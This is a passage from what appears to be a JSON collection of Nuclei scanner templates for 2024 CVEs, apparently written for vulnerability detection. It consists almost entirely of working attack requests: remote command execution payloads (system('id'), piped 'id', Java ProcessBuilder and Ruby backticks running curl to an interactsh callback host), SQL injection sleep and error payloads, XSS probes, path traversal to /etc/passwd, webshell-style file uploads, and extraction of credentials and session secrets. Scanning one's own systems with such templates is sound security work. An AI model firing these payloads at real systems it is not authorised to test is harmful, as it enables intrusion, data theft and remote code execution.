TLR-2005KSH  - Remote Command Execution","severity":"critical"},"requests":[{"raw":["GET /cgi-bin/admin.cgi?Command=sysCommand&Cmd=ifconfig HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<CmdResult>","</xml>","Ethernet","inet"],"condition":"and"},{"type":"word","part":"header","words":["text/xml"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2024-22927","info":{"name":"eyoucms v.1.6.5 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"POST","path":["{{BaseURL}}/login.php?a=get_upload_list&c=Uploadimgnew&info=eyJudW0iOiIxXCI%2BPFNjUmlQdCA%2BYWxlcnQoZG9jdW1lbnQuZG9tYWluKTwvU2NSaVB0PiIsInNpemUiOiIyMDk3MTUyIiwiaW5wdXQiOiIiLCJmdW5jIjoiaGVhZF9waWNfY2FsbF9iYWNrIiwicGF0aCI6ImFsbGltZyIsImlzX3dhdGVyIjoiMSIsImFsZyI6IkhTMjU2In0&lang=cn&m=admin&unneed_syn="],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["name=\"num\" value=\"1\"><ScRiPt >alert(document.domain)</ScRiPt>","id=\"eytime\""],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2024-8517","info":{"name":"SPIP BigUp Plugin - Remote Code Execution","severity":"critical"},"requests":[{"raw":["GET /spip.ph%70?pag%65=spip_pass&lang=fr HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["formulaire_action_args","spip"],"condition":"and","internal":true}],"extractors":[{"type":"regex","part":"body","group":1,"name":"formulaire","regex":["name=['\"]formulaire_action_args['\"]\\s*type=['\"]hidden['\"]\\s*value=['\"]([^'\"]+)['\"]"],"internal":true}]},{"raw":["POST /spip.ph%70?pag%65=spip_pass&lang=fr HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=5f02b65945d644d6a32847ab130e9586\n\n--5f02b65945d644d6a32847ab130e9586\nContent-Disposition: form-data; name=\"page\"\n\nspip_pass\n--5f02b65945d644d6a32847ab130e9586\nContent-Disposition: form-data; name=\"lang\"\n\nfr\n--5f02b65945d644d6a32847ab130e9586\nContent-Disposition: form-data; name=\"formulaire_action\"\n\noubli\n--5f02b65945d644d6a32847ab130e9586\nContent-Disposition: form-data; name=\"formulaire_action_args\"\n\n{{formulaire}}\n--5f02b65945d644d6a32847ab130e9586\nContent-Disposition: form-data; name=\"formulaire_action_sign\"\n\n\n--5f02b65945d644d6a32847ab130e9586\nContent-Disposition: form-data; name=\"oubli\"\n\n{{email}}\n--5f02b65945d644d6a32847ab130e9586\nContent-Disposition: form-data; name=\"nobot\"\n\n\n--5f02b65945d644d6a32847ab130e9586\nContent-Disposition: form-data; name=\"bigup_retrouver_fichiers\"\n\na\n--5f02b65945d644d6a32847ab130e9586\nContent-Disposition: form-data; name=\"RCE['.system('id').die().']\"; filename=\"{{filename}}.txt\"\nContent-Type: text/plain\n\n{{string}}\n--5f02b65945d644d6a32847ab130e9586--\n"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["uid=[0-9]+.*gid=[0-9]+.*"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2024-34061","info":{"name":"Changedetection.io <=v0.45.21 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\n","POST /settings HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\ncsrf_token={{csrf_token}}&requests-time_between_check-weeks=&requests-time_between_check-days=&requests-time_between_check-hours=3&requests-time_between_check-minutes=&requests-time_between_check-seconds=&requests-jitter_seconds=0&application-filter_failure_notification_threshold_attempts=6&application-password=&application-base_url=&application-notification_urls=%22%3E%3Cimg+src%3Dx+onerror%3Dalert%28document.domain%29%3E&application-notification_title=ChangeDetection.io+Notification+-+%7B%7Bwatch_url%7D%7D&application-notification_body=%7B%7Bwatch_url%7D%7D+had+a+change.%0D%0A---%0D%0A%7B%7Bdiff%7D%7D%0D%0A---%0D%0A&application-notification_format=Text&application-fetch_backend=html_requests&application-webdriver_delay=&application-ignore_whitespace=y&application-global_subtractive_selectors=&application-global_ignore_text=&application-api_access_token_enabled=y&requests-extra_proxies-0-proxy_name=&requests-extra_proxies-0-proxy_url=&requests-extra_proxies-1-proxy_name=&requests-extra_proxies-1-proxy_url=&requests-extra_proxies-2-proxy_name=&requests-extra_proxies-2-proxy_url=&requests-extra_proxies-3-proxy_name=&requests-extra_proxies-3-proxy_url=&requests-extra_proxies-4-proxy_name=&requests-extra_proxies-4-proxy_url=&save_button=Save\n"],"skip-variables-check":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<img src=x onerror=alert(document.domain)>","is not a valid AppRise URL"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","part":"body","name":"csrf_token","group":1,"regex":["name=\"csrf_token\" value=\"([^\"]+)\""],"internal":true}]}]},{"id":"CVE-2024-31621","info":{"name":"Flowise 1.6.5 - Authentication Bypass","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/API/V1/credentials"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"credentialName\":","\"updatedDate\":"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2024-0939","info":{"name":"Smart S210 Management Platform - Arbitary File Upload","severity":"critical"},"requests":[{"raw":["POST /Tool/uploadfile.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=----WebKitFormBoundarywnsogfin\nAccept-Encoding: gzip, deflate, br\n\n------WebKitFormBoundarywnsogfin\nContent-Disposition: form-data; name=\"file_upload\"; filename=\"contents.php\"\nContent-Type: application/octet-stream\n\n<?php print({{num1}}*{{num2}}); ?>\n------WebKitFormBoundarywnsogfin\nContent-Disposition: form-data; name=\"txt_path\"\n\n/home/{{filename}}.php\n------WebKitFormBoundarywnsogfin--\n","GET /home/{{filename}}.php HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body_2","words":["{{result}}"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2024-32651","info":{"name":"Change Detection - Server Side Template Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{RootURL}}/"],"redirects":true,"max-redirects":2,"extractors":[{"type":"xpath","name":"version","internal":true,"xpath":["//*[@id=\"right-sticky\"]"]}],"matchers-condition":"and","matchers":[{"type":"status","status":[200]},{"type":"word","part":"body","words":["Change Detection"],"condition":"and"},{"type":"dsl","dsl":["compare_versions(version, '<= 0.45.20')"]}]}]},{"id":"CVE-2024-0305","info":{"name":"Ncast busiFacade - Remote Command Execution","severity":"high"},"requests":[{"raw":["POST /classes/common/busiFacade.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\n{\"name\":\"ping\",\"serviceName\":\"SysManager\",\"userTransaction\":false,\"param\":[\"ping 127.0.0.1 | id\"]}\n"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["uid=([0-9(a-z)]+) gid=([0-9(a-z)]+)","#str"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2024-4434","info":{"name":"LearnPress WordPress LMS Plugin <= 4.2.6.5 - SQL Injection","severity":"critical"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\n","@timeout 20s\nPOST /wp-json/lp/v1/courses/archive-course?term_id={{num}})+OR+SLEEP(6)+--+A HTTP/1.1\nHost: {{Hostname}}\nX-WP-Nonce: {{nonce}}\n"],"matchers":[{"type":"dsl","dsl":["duration_2 >= 6","status_code_2 == 200","contains(content_type,\"application/json\")","contains_all(body_2,\"No courses were found\",\"success\")"],"condition":"and"}],"extractors":[{"type":"regex","name":"nonce","part":"body","group":1,"regex":["\"nonce\":\"([a-z0-9]+)\",\"is_course_archive\""],"internal":true}]}]},{"id":"CVE-2024-3850","info":{"name":"Uniview NVR301-04S2-P4 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/V1.0%3CsVg/onload=alert.bind%28%29%281%29%3E/Alarm/Exceptions/LinkageActions?="],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["/V1.0<sVg/onload=alert.bind()(1)>/Alarm/Exceptions/LinkageActions?="],"condition":"and"},{"type":"word","part":"header","words":["NVRDVR"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2024-24763","info":{"name":"JumpServer < 3.10.0 - Open Redirect","severity":"medium"},"requests":[{"raw":["POST /{{paths}} HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nusername={{username}}&password={{password}}\n"],"payloads":{"paths":["core/auth/login/?next=//oast.me","auth/login/?next=//oast.me","login/?next=//oast.me"]},"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\\-_]*\\.)?oast\\.me(?:\\s*?)$"]}]}]},{"id":"CVE-2024-0200","info":{"name":"Github Enterprise Authenticated Remote Code Execution","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/api/v3/user/orgs"],"headers":{"Authorization":"Basic {{base64('{{username}}' + ':' + '{{password}}')}}"},"extractors":[{"type":"json","part":"body","name":"org_name","internal":true,"json":[".[].login"]}]},{"method":"GET","path":["{{BaseURL}}/api/v3/orgs/{{org_name}}/memberships/{{username}}"],"headers":{"Authorization":"Basic {{base64('{{username}}' + ':' + '{{password}}')}}"},"matchers-condition":"and","matchers":[{"type":"word","words":["\"role\": \"admin\""],"part":"body"}]},{"method":"POST","path":["{{BaseURL}}/api/v3/orgs/{{org_name}}/repos"],"headers":{"Content-Type":"application/json","Authorization":"Basic {{base64('{{username}}' + ':' + '{{password}}')}}"},"body":"{\n  \"name\": \"{{randstr}}\"\n}\n","matchers":[{"type":"status","status":[201]}]},{"method":"GET","cookie-reuse":true,"path":["{{BaseURL}}/login"],"extractors":[{"type":"regex","part":"body","internal":true,"group":1,"regex":["name=\"authenticity_token\" value=\"(.*?)\""],"name":"csrf_token"}]},{"method":"POST","path":["{{BaseURL}}/session"],"headers":{"Content-Type":"application/x-www-form-urlencoded"},"body":"login={{username}}&password={{password}}&commit=Sign%20in&authenticity_token={{csrf_token}}&\n","matchers":[{"type":"status","status":[302]},{"type":"word","words":["_gh_render"],"part":"header"}]},{"method":"GET","path":["{{BaseURL}}/organizations/{{org_name}}/settings/actions/repository_items?page=1&rid_key=nw_fsck"],"extractors":[{"type":"regex","group":1,"name":"ghe_secret","internal":true,"regex":["&quot;ENTERPRISE_SESSION_SECRET&quot;=&gt;&quot;([^\"]+?)&quot;"],"part":"body"}],"matchers":[{"type":"word","words":["ENTERPRISE_SESSION_SECRET"],"part":"body"}]},{"method":"GET","path":["{{BaseURL}}/"],"headers":{"Cookie":"_gh_render={{final_payoad}}"},"matchers-condition":"and","matchers":[{"type":"status","status":[500]},{"type":"word","part":"interactsh_protocol","words":["dns"]}]}]},{"id":"CVE-2024-6159","info":{"name":"Push Notification for Post and BuddyPress <= 1.93 - SQL Injection","severity":"critical"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["contains(body, \"/wp-content/plugins/push-notification-for-post-and-buddypress\")"],"internal":true}]},{"raw":["@timeout 50s\nPOST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n\naction=icpushcallback&onesignal_externalid=1+AND+SLEEP(6)&pushtype=onesignal_subscribed_users\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","contains(content_type,\"text/html\")","status_code == 200"],"condition":"and"}]}]},{"id":"CVE-2024-30269","info":{"name":"DataEase <= 2.4.1 - Sensitive Information Exposure","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/de2api/engine/getEngine;.js"],"matchers":[{"type":"dsl","dsl":["contains_all(body, \"username\", \"password\", \"port\", \"name\\\":\", \"pid\\\":\")","contains(content_type,\"application/json\")","status_code == 200"],"condition":"and"}]}]},{"id":"CVE-2024-5936","info":{"name":"PrivateGPT < 0.5.0 - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/file=https://oast.me"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\\-_\\.@]*)oast\\.me.*$"]}]}]},{"id":"CVE-2024-8877","info":{"name":"Riello Netman 204 - SQL Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/cgi-bin/db_eventlog_w.cgi?date_start=0&date_end=1715630160&gravity=%25&type=%25%27and/**/%271%27=%271"],"matchers":[{"type":"dsl","dsl":["contains_all(body, \"START APPLICATION\", \"category\\\":\", \"codeStr\\\":\")","status_code == 200"],"condition":"and"}]}]},{"id":"CVE-2024-5315","info":{"name":"Dolibarr ERP CMS `list.php` - SQL Injection","severity":"critical"},"requests":[{"raw":["POST /htdocs/index.php?mainmenu=home HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nloginfunction=loginfunction&username={{username}}&password={{password}}\n","GET /htdocs/commande/list.php?viewstatut=x%27 HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body_2","words":["You have an error in your SQL syntax"]},{"type":"word","part":"header_1","words":["Set-Cookie: DOLSESSID_"]},{"type":"word","part":"body_1","words":["SuperAdmin"]}]}]},{"id":"CVE-2024-8522","info":{"name":"LearnPress \u2013 WordPress LMS - SQL Injection","severity":"critical"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["contains(body, \"/wp-content/plugins/learnpress\")"],"internal":true}]},{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1\n","@timeout: 30s\nGET /wp-json/learnpress/v1/courses?course_filter=&c_fields=post_title,(select(sleep(6))),ID& HTTP/1.1\nHost: {{Hostname}}\n","@timeout: 30s\nGET /wp-json/learnpress/v1/courses?course_filter=&c_only_fields=post_title,(select(sleep(6))),ID& HTTP/1.1\nHost: {{Hostname}}\n"],"host-redirects":true,"matchers":[{"type":"dsl","name":"time-based","dsl":["duration_1>=6","duration_2>=6"]}]}]},{"id":"CVE-2024-21683","info":{"name":"Atlassian Confluence Data Center and Server - Remote Code Execution","severity":"high"},"requests":[{"raw":["POST /dologin.action HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nos_username={{username}}&os_password={{password}}&login=Log+in&os_destination=\n","POST /doauthenticate.action HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\nX-Atlassian-Token: no-check\n\npassword={{password}}&authenticate=Confirm&destination=%2Fadmin%2Fplugins%2Fnewcode%2Faddlanguage.action\n","POST /admin/plugins/newcode/addlanguage.action HTTP/1.1\nHost: {{Hostname}}\nX-Atlassian-Token: no-check\nContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryFcBwsDjo5LkYWGWE\n\n------WebKitFormBoundaryFcBwsDjo5LkYWGWE\nContent-Disposition: form-data; name=\"languageFile\";filename=\"{{randstr}}.js\"\nContent-type: text/javascript\n\nnew java.lang.ProcessBuilder[\"(java.lang.String[])\"]([\"curl\",\"{{interactsh-url}}\"]).start()\n------WebKitFormBoundaryFcBwsDjo5LkYWGWE\nContent-Disposition: form-data; name=\"newLanguageName\"\n\n{{randstr}}\n------WebKitFormBoundaryFcBwsDjo5LkYWGWE--\n"],"matchers":[{"type":"dsl","dsl":["status_code_1 == 302 && status_code_2 == 302","contains(interactsh_protocol, 'dns')","contains(body_3, \"confluence\")"],"condition":"and"}]}]},{"id":"CVE-2024-37881","info":{"name":"SiteGuard WP Plugin <= 1.7.6 - Login Page Disclosure","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/siteguard/readme.txt"],"matchers":[{"type":"dsl","internal":true,"dsl":["status_code == 200","contains(body, \"SiteGuard WP Plugin\")"],"condition":"and"}]},{"method":"GET","path":["{{BaseURL}}/wp-register.php"],"matchers":[{"type":"dsl","dsl":["!contains(tolower(location), 'wp-login.php')"]}],"extractors":[{"type":"kval","kval":["location"]}]}]},{"id":"CVE-2024-36837","info":{"name":"CRMEB v.5.2.2 - SQL Injection","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/api/products?limit=20&priceOrder=&salesOrder=&selectId=GTID_SUBSET(CONCAT(0x7e,(SELECT+(ELT(3550=3550,md5({{num}})))),0x7e),3550)"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["{{md5(num)}}","SQLSTATE"],"condition":"and"},{"type":"word","part":"content_type","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2024-5947","info":{"name":"Deep Sea Electronics DSE855 - Authentication Bypass","severity":"medium"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["contains(body,\"Copyright Deep Sea Electronics\")","status_code == 200"],"condition":"and","internal":true}]},{"raw":["GET /Backup.bin HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["contains(content_type,\"Unknown\")","status_code == 200"],"condition":"and"}]}]},{"id":"CVE-2024-29972","info":{"name":"Zyxel NAS326 Firmware < V5.21(AAZF.17)C0 - NsaRescueAngel Backdoor Account","severity":"critical"},"requests":[{"raw":["GET /desktop,/cgi-bin/remote_help-cgi/favicon.ico?type=sshd_tdc HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code == 200","contains(body, 'result=0')"],"condition":"and"}]}]},{"id":"CVE-2024-2330","info":{"name":"NS-ASG Application Security Gateway 6.3 - Sql Injection","severity":"medium"},"requests":[{"raw":["POST /protocol/index.php  HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\njsoncontent={\"protocolType\":\"addmacbind\",\"messagecontent\":[\"{\\\"BandIPMacId\\\":\\\"1\\\",\\\"IPAddr\\\":\\\"eth0'and(updatexml(1,concat(0x7e,(select+version())),1))='\\\",\\\"MacAddr\\\":\\\"\\\",\\\"DestIP\\\":\\\"\\\",\\\"DestMask\\\":\\\"255.255.255.0\\\",\\\"Description\\\":\\\"Sample+Description\\\"}\"]}\n"],"matchers":[{"type":"dsl","dsl":["contains_all(body,\"XPATH syntax error:\",\"alert\") && contains(header,\"text/html\")","status_code == 200"],"condition":"and"}],"extractors":[{"type":"regex","name":"version","group":1,"regex":["XPATH syntax error: '([~0-9.]+)'"]}]}]},{"id":"CVE-2024-40422","info":{"name":"Devika v1 - Path Traversal","severity":"critical"},"requests":[{"raw":["GET /api/data HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["contains_all(body,\"models\",\"projects\",\"OPENAI\",\"OLLAMA\")","contains(content_type,\"application/json\")","status_code == 200"],"condition":"and","internal":true}]},{"raw":["GET /api/get-browser-snapshot?snapshot_path=../../../../etc/passwd HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"word","part":"header","words":["application/octet-stream"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2024-7339","info":{"name":"TVT DVR Sensitive Device - Information Disclosure","severity":"medium"},"requests":[{"raw":["POST /queryDevInfo HTTP/1.1\nHost: {{Hostname}}\n\n<?xml version=\"1.0\" encoding=\"utf-8\" ?><request version=\"1.0\" systemType=\"NVMS-9000\" clientType=\"WEB\"/>\n"],"matchers-condition":"and","matchers":[{"type":"word","words":["softwareVersion","eth0"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2024-7786","info":{"name":"Sensei LMS < 4.24.2 - Email Template Leak","severity":"high"},"requests":[{"raw":["GET /index.php/wp-json/wp/v2/sensei_email/ HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["contains_all(body,\"id\",\"date_gmt\",\"slug\")","contains(content_type,\"application/json\")","status_code == 200"],"condition":"and","internal":true}],"extractors":[{"type":"json","part":"body","name":"template_id","json":[".[0].id"],"internal":true}]},{"raw":["GET /index.php/wp-json/wp/v2/sensei_email/{{template_id}} HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["sensei_email_preview_id={{template_id}}","media?parent={{template_id}}"],"condition":"and"},{"type":"word","part":"content_type","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2024-5975","info":{"name":"CZ Loan Management <= 1.1 - SQL Injection","severity":"critical"},"requests":[{"raw":["GET /wp-content/plugins/cz-loan-management/README.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["contains(body,\"CZ Loan Management\")","status_code == 200"],"condition":"and","internal":true}]},{"raw":["@timeout 20s\nPOST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\naction=cz_plugin_for_user_get_percentage&selectedperiod=(select*from(select(sleep(6)))a)\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","contains(content_type,\"text/html\")","status_code == 200"],"condition":"and"}]}]},{"id":"CVE-2024-27198","info":{"name":"TeamCity < 2023.11.4 - Authentication Bypass","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/hax?jsp=/app/rest/server;.jsp"],"matchers":[{"type":"dsl","dsl":["status_code == 200","contains(header, \"application/xml\")","contains_all(body, \"buildNumber\", \"server version\", \"internalId\")"],"condition":"and"}]}]},{"id":"CVE-2024-41955","info":{"name":"Open Redirect in Login Redirect - MobSF","severity":"medium"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\n","POST /login/?next=//interact.sh HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nusername={{username}}&password={{password}}\n"],"host-redirects":true,"matchers":[{"type":"regex","part":"header_2","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)?(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$"]}]}]},{"id":"CVE-2024-37152","info":{"name":"Argo CD Unauthenticated Access to sensitive setting","severity":"medium"},"requests":[{"raw":["GET /api/v1/settings HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"passwordPattern\":","\"appLabelKey\":"],"condition":"and"},{"type":"word","part":"content_type","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2024-33113","info":{"name":"D-LINK DIR-845L bsc_sms_inbox.php file - Information Disclosure","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/getcfg.php?a=%0A_POST_SERVICES=DEVICE.ACCOUNT%0AAUTHORIZED_GROUP=1"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<service>DEVICE.ACCOUNT</service>","<seqno>"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2024-22207","info":{"name":"Fastify Swagger-UI - Information Disclosure","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/documentation/playwright.config.js"],"matchers-condition":"and","matchers":[{"type":"word","words":["module.exports","defineConfig"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2024-3742","info":{"name":"Electrolink FM/DAB/TV Transmitter (controlloLogin.js) - Credentials Disclosure","severity":"high"},"requests":[{"raw":["GET /controlloLogin.js HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["contains(content_type, \"application/x-javascript\")","contains(body, \"user==\") && contains(body, \"password==\")","status_code == 200"],"condition":"and"}],"extractors":[{"type":"regex","part":"body","regex":["user\\s*==\\s*'([^']*)'\\s*&&\\s*password\\s*==\\s*'([^']*)'"]}]}]},{"id":"CVE-2024-20440","info":{"name":"Cisco Smart Licensing Utility UnAuthenticated Logs Exposure Leaking Plaintext Credentials","severity":"high"},"requests":[{"raw":["GET /cslu/v1/var/logs/customer-cslu-lib-log.log HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["csluev.log"]},{"type":"word","part":"content_type","words":["text/x-log"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2024-46986","info":{"name":"Camaleon CMS < 2.8.1 Arbitrary File Write to RCE","severity":"critical"},"requests":[{"raw":["GET /admin/login HTTP/1.1\nHost: {{Hostname}}\n"],"extractors":[{"type":"regex","part":"body","internal":true,"name":"nonce","group":1,"regex":["name=\"authenticity_token\" value=\"(.*?)\""]}]},{"raw":["POST /admin/login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\nConnection: keep-alive\n\nauthenticity_token={{nonce}}&user%5Busername%5D={{username}}&user%5Bpassword%5D={{password}}\n"],"matchers":[{"type":"dsl","dsl":["contains(location,\"/admin/dashboard\")"],"internal":true}]},{"raw":["POST /admin/media/upload?actions=false HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data;boundary=----WebKitFormBoundarynJs8ffRP2MgQXiF8\n\n------WebKitFormBoundarynJs8ffRP2MgQXiF8\nContent-Disposition: form-data; name=\"file_upload\"; filename=\"{{filename}}.rb\"\nContent-Type: text/x-ruby-script\n\n`curl {{interactsh-url}}`\n------WebKitFormBoundarynJs8ffRP2MgQXiF8\nContent-Disposition: form-data; name=\"folder\"\n\n../../../config/initializers/\n------WebKitFormBoundarynJs8ffRP2MgQXiF8\nContent-Disposition: form-data; name=\"skip_auto_crop\"\n\ntrue\n------WebKitFormBoundarynJs8ffRP2MgQXiF8--\n"],"matchers":[{"type":"word","part":"body","words":["{\"name\":\"{{filename}}.rb\",\"folder_path\":\"../../../config/initializers\""],"internal":true}]},{"raw":["POST /admin/media/upload?actions=false HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data;boundary=----WebKitFormBoundarynJs8ffRP2MgQXiF8\n\n------WebKitFormBoundarynJs8ffRP2MgQXiF8\nContent-Disposition: form-data; name=\"file_upload\"; filename=\"restart.txt\"\nContent-Type: text/x-ruby-script\n\n{{randstr}}\n------WebKitFormBoundarynJs8ffRP2MgQXiF8\nContent-Disposition: form-data; name=\"folder\"\n\n../../../tmp/\n------WebKitFormBoundarynJs8ffRP2MgQXiF8\nContent-Disposition: form-data; name=\"skip_auto_crop\"\n\ntrue\n------WebKitFormBoundarynJs8ffRP2MgQXiF8--\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["dns"]},{"type":"word","part":"body","words":["{\"name\":\"restart.txt\",\"folder_path\":\"../../../tmp\""]}]}]},{"id":"CVE-2024-28734","info":{"name":"Coda v.2024Q1 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /coda/frameset?cols=\"><frame%20src=\"javascript:alert(document.domain)\"> HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<frameset cols=\"\"><frame src=\"javascript:alert(document.domain)\">"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2024-7714","info":{"name":"AI Assistant with ChatGPT by AYS <= 2.0.9 - Unauthenticated AJAX Calls","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-admin/admin-ajax.php?ays_chatgpt_assistant_id=1&action=ays_chatgpt_admin_ajax&function=ays_chatgpt_disconnect"],"matchers":[{"type":"dsl","dsl":["regex(\"^true$\", body)","contains(content_type, \"text/html\")","status_code == 200"],"condition":"and"}]}]},{"id":"CVE-2024-3274","info":{"name":"D-LINK DNS-320L,DNS-320LW and DNS-327L - Information Disclosure","severity":"medium"},"requests":[{"raw":["GET /cgi-bin/info.cgi HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["contains_all(body, \"Model=\", \"Build=\", \"Macaddr=\")","status_code == 200"],"condition":"and"}]}]},{"id":"CVE-2024-43917","info":{"name":"WordPress TI WooCommerce Wishlist Plugin <= 2.8.2 - SQL Injection","severity":"critical"},"requests":[{"raw":["GET /?p=1 HTTP/1.1\nHost: {{Hostname}}\n"],"redirects":true,"extractors":[{"type":"regex","part":"body","internal":true,"name":"nonce","group":1,"regex":["\"nonce\":\"([a-z0-9]+)\""]}]},{"raw":["GET /product-category/uncategorized/ HTTP/1.1\nHost: {{Hostname}}\n"],"extractors":[{"type":"regex","part":"body","internal":true,"name":"product_id","group":1,"regex":["data-tinvwl_product_id=\"([0-9]+)\""]}],"matchers":[{"type":"word","part":"body","words":["data-tinvwl_product_id=\""],"internal":true}]},{"raw":["POST /product-category/uncategorized/ HTTP/1.1\nHost: {{Hostname}}\nX-Requested-With: XMLHttpRequest\nContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryNfcbSwJQX8ALWCMG\n\n------WebKitFormBoundaryNfcbSwJQX8ALWCMG\nContent-Disposition: form-data; name=\"form[tinvwl-hidden-fields]\"\n\n[]\n------WebKitFormBoundaryNfcbSwJQX8ALWCMG\nContent-Disposition: form-data; name=\"tinv_wishlist_id\"\n\n\n------WebKitFormBoundaryNfcbSwJQX8ALWCMG\nContent-Disposition: form-data; 